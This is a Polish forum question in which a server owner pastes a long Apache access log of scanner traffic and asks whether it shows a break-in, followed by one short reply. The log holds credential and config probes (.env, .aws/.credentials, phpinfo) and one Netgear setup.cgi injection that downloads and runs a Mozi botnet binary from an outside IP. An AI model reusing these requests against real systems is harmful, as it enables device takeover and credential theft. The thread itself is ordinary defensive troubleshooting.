Server OVH (dziwne wpisy w httpd/acces.log)

Od wczoraj mam następujące wpisy w moim serwerze na OVH na którym jest zainstalowany CentOS Linux 8.2.2004

138.99.216.228 - - [05/Jul/2022:04:07:06 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
192.241.208.93 - - [05/Jul/2022:04:14:30 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [05/Jul/2022:04:18:29 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
192.241.213.59 - - [05/Jul/2022:04:38:28 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.222.172 - - [05/Jul/2022:05:13:30 +0200] "MGLNDD_51.195.90.75_443\n" 400 226 "-" "-"
164.92.147.180 - - [05/Jul/2022:05:20:33 +0200] "GET / HTTP/1.1" 404 196 "-" "Java/1.8.0_332"
185.7.214.104 - - [05/Jul/2022:05:26:15 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
199.30.231.5 - - [05/Jul/2022:05:35:26 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.220.47 - - [05/Jul/2022:05:38:49 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.196.220.70 - - [05/Jul/2022:05:40:56 +0200] "GET / HTTP/1.1" 404 196 "-" "Linux Gnu (cow)"
2.47.180.141 - - [05/Jul/2022:05:46:34 +0200] "GET / HTTP/1.0" 404 196 "-" "-"
222.186.19.205 - - [05/Jul/2022:05:53:57 +0200] "CONNECT whois.pconline.com.cn:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
222.186.19.205 - - [05/Jul/2022:05:53:57 +0200] "CONNECT zz.bdstatic.com:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
222.186.19.205 - - [05/Jul/2022:05:53:57 +0200] "GET http://whois.pconline.com.cn/jsFunction.jsp HTTP/1.1" 404 196 "-" "Mozilla/5.0 ArchLinux (X11; U; Linux x86_64; en-US) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100"
52.255.168.47 - - [05/Jul/2022:06:02:51 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
188.226.185.169 - - [05/Jul/2022:06:25:37 +0200] "\x16\x03\x01" 400 226 "-" "-"
5.235.205.176 - - [05/Jul/2022:06:26:48 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
5.235.205.176 - - [05/Jul/2022:06:26:48 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
221.2.163.231 - - [05/Jul/2022:06:36:31 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0"
185.7.214.104 - - [05/Jul/2022:06:38:08 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.162.235.110 - - [05/Jul/2022:06:50:47 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
216.218.206.68 - - [05/Jul/2022:06:51:54 +0200] "GET / HTTP/1.1" 404 196 "-" "-"
138.99.216.228 - - [05/Jul/2022:06:56:56 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
178.73.215.171 - - [05/Jul/2022:07:00:34 +0200] "GET / HTTP/1.0" 404 196 "-" "-"
88.214.43.118 - - [05/Jul/2022:07:03:47 +0200] "GET /environments/.aws/.credentials HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
88.214.43.118 - - [05/Jul/2022:07:03:47 +0200] "\x16\x03\x01\x01]\x01" 400 226 "-" "-"
202.164.136.28 - - [05/Jul/2022:07:06:09 +0200] "GET /boaform/admin/formLogin?username=adminisp&psd=adminisp HTTP/1.0" 404 196 "-" "-"
94.102.61.10 - - [05/Jul/2022:07:06:51 +0200] "GET / HTTP/1.1" 404 196 "-" "python-requests/2.26.0"
185.189.182.234 - - [05/Jul/2022:07:12:33 +0200] "GET / HTTP/1.1" 400 226 "-" "-"
188.253.49.24 - - [05/Jul/2022:07:24:00 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
188.253.49.24 - - [05/Jul/2022:07:24:00 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
188.253.49.24 - - [05/Jul/2022:07:24:00 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
192.241.223.4 - - [05/Jul/2022:07:40:15 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [05/Jul/2022:07:57:21 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.7.214.104 - - [05/Jul/2022:08:14:50 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.220.171 - - [05/Jul/2022:08:45:53 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.214.46 - - [05/Jul/2022:09:01:38 +0200] "\x16\x03\x01" 400 226 "-" "-"
221.2.163.231 - - [05/Jul/2022:09:07:23 +0200] "\x16\x03\x01" 400 226 "-" "-"
103.220.30.102 - - [05/Jul/2022:09:08:51 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
193.46.255.228 - - [05/Jul/2022:09:13:17 +0200] "\x16\x03\x01\x01.\x01" 400 226 "-" "-"
20.28.203.31 - - [05/Jul/2022:09:13:57 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.28.203.31 - - [05/Jul/2022:09:13:58 +0200] "POST / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.28.203.31 - - [05/Jul/2022:09:13:58 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
109.237.103.38 - - [05/Jul/2022:09:31:07 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
109.237.103.38 - - [05/Jul/2022:09:31:07 +0200] "\x16\x03\x01\x01C\x01" 400 226 "-" "-"
154.89.5.124 - - [05/Jul/2022:09:35:12 +0200] "\x16\x03\x01" 400 226 "-" "-"
154.89.5.124 - - [05/Jul/2022:09:35:13 +0200] "\x16\x03\x01" 400 226 "-" "-"
154.89.5.124 - - [05/Jul/2022:09:35:14 +0200] "\x16\x03\x01" 400 226 "-" "-"
154.89.5.124 - - [05/Jul/2022:09:35:14 +0200] "REQMOD icap://icap-server.net/server?arg=87 ICAP/1.0" 400 226 "-" "-"
192.241.219.87 - - [05/Jul/2022:09:37:20 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.220.24 - - [05/Jul/2022:09:39:38 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.223.11 - - [05/Jul/2022:09:42:19 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.7.214.104 - - [05/Jul/2022:09:45:41 +0200] "\x16\x03\x01" 400 226 "-" "-"
138.99.216.228 - - [05/Jul/2022:09:46:29 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
193.201.9.157 - - [05/Jul/2022:09:46:43 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
193.201.9.157 - - [05/Jul/2022:09:46:46 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
193.201.9.157 - - [05/Jul/2022:09:46:50 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
5.184.104.92 - - [05/Jul/2022:09:52:27 +0200] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (Linux; Android 11; SM-A127F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36"
5.184.104.92 - - [05/Jul/2022:09:52:27 +0200] "GET /index.php HTTP/1.1" 302 402 "-" "Mozilla/5.0 (Linux; Android 11; SM-A127F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36"
5.184.104.92 - - [05/Jul/2022:09:52:27 +0200] "GET /index.php/users HTTP/1.1" 200 523501 "-" "Mozilla/5.0 (Linux; Android 11; SM-A127F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36"
5.184.104.92 - - [05/Jul/2022:09:52:29 +0200] "GET /bootstrap-5.1.3-dist/js/bootstrap.js HTTP/1.1" 304 - "http://dziennik.website/index.php/users" "Mozilla/5.0 (Linux; Android 11; SM-A127F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.88 Mobile Safari/537.36"
159.65.151.57 - - [05/Jul/2022:23:40:44 +0200] "\x16\x03\x01" 400 226 "-" "-"
159.65.151.57 - - [05/Jul/2022:23:40:45 +0200] "\x16\x03\x01" 400 226 "-" "-"
138.99.216.228 - - [05/Jul/2022:23:53:37 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
222.186.19.205 - - [05/Jul/2022:23:56:44 +0200] "CONNECT whois.pconline.com.cn:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
222.186.19.205 - - [05/Jul/2022:23:56:45 +0200] "CONNECT pv.sohu.com:443 HTTP/1.1" 405 224 "-" "Go-http-client/1.1"
222.186.19.205 - - [05/Jul/2022:23:56:45 +0200] "GET http://whois.pconline.com.cn/jsFunction.jsp HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.1.249.1025 Safari/532.5"
185.7.214.104 - - [06/Jul/2022:00:09:09 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
85.93.152.58 - - [06/Jul/2022:00:31:54 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
45.143.200.118 - - [06/Jul/2022:00:35:50 +0200] "\x03" 400 226 "-" "-"
20.28.203.31 - - [06/Jul/2022:00:42:52 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.28.203.31 - - [06/Jul/2022:00:42:52 +0200] "POST / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.28.203.31 - - [06/Jul/2022:00:42:53 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
62.102.148.68 - - [06/Jul/2022:00:51:45 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.220.101.32 - - [06/Jul/2022:00:51:49 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36"
2.196.132.178 - - [06/Jul/2022:00:52:50 +0200] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://2.196.132.178:35282/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 196 "-" "-"
172.104.138.223 - - [06/Jul/2022:01:57:24 +0200] "GET /fuN3 HTTP/1.0" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
104.129.48.126 - - [06/Jul/2022:02:08:52 +0200] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
185.7.214.104 - - [06/Jul/2022:02:11:17 +0200] "\x16\x03\x01" 400 226 "-" "-"
138.99.216.228 - - [06/Jul/2022:02:42:14 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
104.129.48.126 - - [06/Jul/2022:02:48:32 +0200] "GET /000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:48:34 +0200] "GET /WebItemsLevel.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:48:35 +0200] "GET /polycom/000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:50:41 +0200] "GET /aastra.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:51:03 +0200] "GET /y000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:56:15 +0200] "GET /spa122.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:57:21 +0200] "GET /configs/spa122.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:57:39 +0200] "GET /yealink/WebItemsLevel.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:57:39 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:57:39 +0200] "GET /spa112.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:59:53 +0200] "GET /configs/y000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
104.129.48.126 - - [06/Jul/2022:02:59:57 +0200] "GET /configs/000000000000.cfg HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0"
120.41.45.199 - - [06/Jul/2022:03:18:27 +0200] "GET / HTTP/1.1" 302 217 "-" "Mozilla/5.0 (compatible; ThinkChaos/0.3.0; +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow._Thank_you.)"
120.41.45.199 - - [06/Jul/2022:03:18:28 +0200] "GET /index.php HTTP/1.1" 302 402 "http:///******.website" "Mozilla/5.0 (compatible; ThinkChaos/0.3.0; +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow._Thank_you.)"
120.41.45.199 - - [06/Jul/2022:03:18:29 +0200] "GET /index.php/login HTTP/1.1" 200 4372 "http://******.website/index.php" "Mozilla/5.0 (compatible; ThinkChaos/0.3.0; +In_the_test_phase,_if_the_ThinkChaos_brings_you_trouble,_please_add_disallow._Thank_you.)"
20.239.52.159 - - [06/Jul/2022:03:19:52 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:53 +0200] "POST / HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:53 +0200] "GET /.env HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:54 +0200] "POST / HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:54 +0200] "GET /.env.save HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
20.239.52.159 - - [06/Jul/2022:03:19:55 +0200] "POST / HTTP/1.1" 404 196 "-" "python-requests/2.28.1"
45.95.169.113 - - [06/Jul/2022:03:34:34 +0200] "\x16\x03\x01" 400 226 "-" "-"
98.143.61.244 - - [06/Jul/2022:04:17:32 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.7.214.104 - - [06/Jul/2022:04:20:29 +0200] "\x16\x03\x01" 400 226 "-" "-"
45.83.64.195 - - [06/Jul/2022:04:21:31 +0200] "\x16\x03\x01" 400 226 "-" "-"
34.234.90.160 - - [06/Jul/2022:04:26:04 +0200] "\x16\x03\x01" 400 226 "-" "-"
34.234.90.160 - - [06/Jul/2022:04:26:04 +0200] "GET / HTTP/1.1" 404 196 "-" "Go-http-client/1.1"
66.70.212.115 - - [06/Jul/2022:04:29:38 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.70.212.115 - - [06/Jul/2022:04:29:38 +0200] "POST / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
66.70.212.115 - - [06/Jul/2022:04:29:39 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
180.149.125.171 - - [06/Jul/2022:04:34:57 +0200] "GET /stalker_portal/server/tools/auth_simple.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36"
192.241.214.190 - - [06/Jul/2022:04:41:52 +0200] "\x16\x03\x01" 400 226 "-" "-"
170.210.45.163 - - [06/Jul/2022:04:41:52 +0200] "POST /mgmt/tm/util/bash HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36"
170.210.45.163 - - [06/Jul/2022:04:41:53 +0200] "GET / HTTP/1.1" 404 196 "-" "curl/7.58.0"
192.241.222.234 - - [06/Jul/2022:04:44:03 +0200] "\x16\x03\x03\x01\xa5\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:03 +0200] "\x16\x03\x03\x01\xa5\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:03 +0200] "\x16\x03\x03\x01V\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:04 +0200] "\x16\x03\x03\x01H\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:04 +0200] "\x16\x03\x03\x01\x99\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:04 +0200] "\x16\x03\x02\x01\x9a\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:06 +0200] "\x16\x03\x01\x01\xa7\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:06 +0200] "\x16\x03\x01\x01\xa7\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:07 +0200] "\x16\x03\x01\x01\x9d\x01" 400 226 "-" "-"
192.241.222.234 - - [06/Jul/2022:04:44:08 +0200] "\x16\x03\x01\x01\xb4\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:40 +0200] "\x16\x03\x03\x01\xa5\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:42 +0200] "\x16\x03\x03\x01\xa5\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:42 +0200] "\x16\x03\x03\x01V\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:48 +0200] "\x16\x03\x03\x01H\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:02:56 +0200] "\x16\x03\x03\x01\x99\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:04 +0200] "\x16\x03\x02\x01\x9a\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:12 +0200] "\x16\x03\x01\x01\xa7\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:12 +0200] "\x16\x03\x01\x01\xa7\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:20 +0200] "\x16\x03\x01\x01\x9d\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:28 +0200] "\x16\x03\x01\x01\xb4\x01" 400 226 "-" "-"
167.172.240.54 - - [06/Jul/2022:06:03:36 +0200] "\x16\x03\x01" 400 226 "-" "-"
192.241.220.73 - - [06/Jul/2022:06:06:13 +0200] "\x16\x03\x01" 400 226 "-" "-"
74.201.28.114 - - [06/Jul/2022:06:06:44 +0200] "POST /boaform/admin/formLogin HTTP/1.1" 404 196 "http://51.195.90.75:80/admin/login.asp" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"
152.36.205.236 - - [06/Jul/2022:06:08:09 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
192.241.221.113 - - [06/Jul/2022:06:10:25 +0200] "\x16\x03\x01" 400 226 "-" "-"
185.7.214.104 - - [06/Jul/2022:06:15:56 +0200] "\x16\x03\x01" 400 226 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /.env HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /_profiler/phpinfo HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /phpinfo HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /phpinfo.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.json HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /settings.json HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /info.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /configuration.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /conf.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /settings.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:50 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
132.145.9.189 - - [06/Jul/2022:06:31:51 +0200] "GET /config.php HTTP/1.1" 404 196 "-" "-"
154.6.130.144 - - [06/Jul/2022:06:37:08 +0200] "\x16\x03\x01\x02" 400 226 "-" "-"
104.206.128.74 - - [06/Jul/2022:06:46:29 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
95.255.65.13 - - [06/Jul/2022:07:19:12 +0200] "\x16\x03\x01\x01\x89\x01" 400 226 "-" "-"
192.241.214.46 - - [06/Jul/2022:07:40:46 +0200] "GET / HTTP/1.1" 404 196 "-" "Mozilla/5.0 zgrab/0.x"
185.7.214.104 - - [06/Jul/2022:07:49:59 +0200] "\x16\x03\x01" 400 226 "-" "-"
20.222.102.211 - - [06/Jul/2022:08:00:54 +0200] "GET /.env HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
20.222.102.211 - - [06/Jul/2022:08:00:54 +0200] "POST / HTTP/1.1" 404 196 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
192.241.212.172 - - [06/Jul/2022:08:02:55 +0200] "\x16\x03\x01" 400 226 "-" "-"
138.99.216.228 - - [06/Jul/2022:08:23:56 +0200] "\x16\x03\x02\x01o\x01" 400 226 "-" "-"
137.226.113.44 - - [06/Jul/2022:08:44:23 +0200] "\x16\x03\x01" 400 226 "-" "-"
80.94.93.43 - - [06/Jul/2022:09:33:29 +0200] "GET / HTTP/1.1" 302 213 "-" "libwww-perl/6.67"

I dzisiaj jak wstałem to to jak uruchomiłem stronę domena.website to zamiast strony pokazała się pusta strona i tak tez się stało jak wpisałem czysty adres ip i to dotyczyły równiez subdomen więc weszłem na webmina i zrestartowałem server apache i wszystko działa dobrze, ale według mnie to mogło być włamanie i teraz nie wiem co o tym sądzić ?

1. A co to za strona była? Na jakim Framework. Część wpisów wygląda na prymitywny atak, którego celem było wyciągnięcie plików konfiguracyjnych. Na takie ataki podatne są stare lub nieaktualizowane Frameworki.
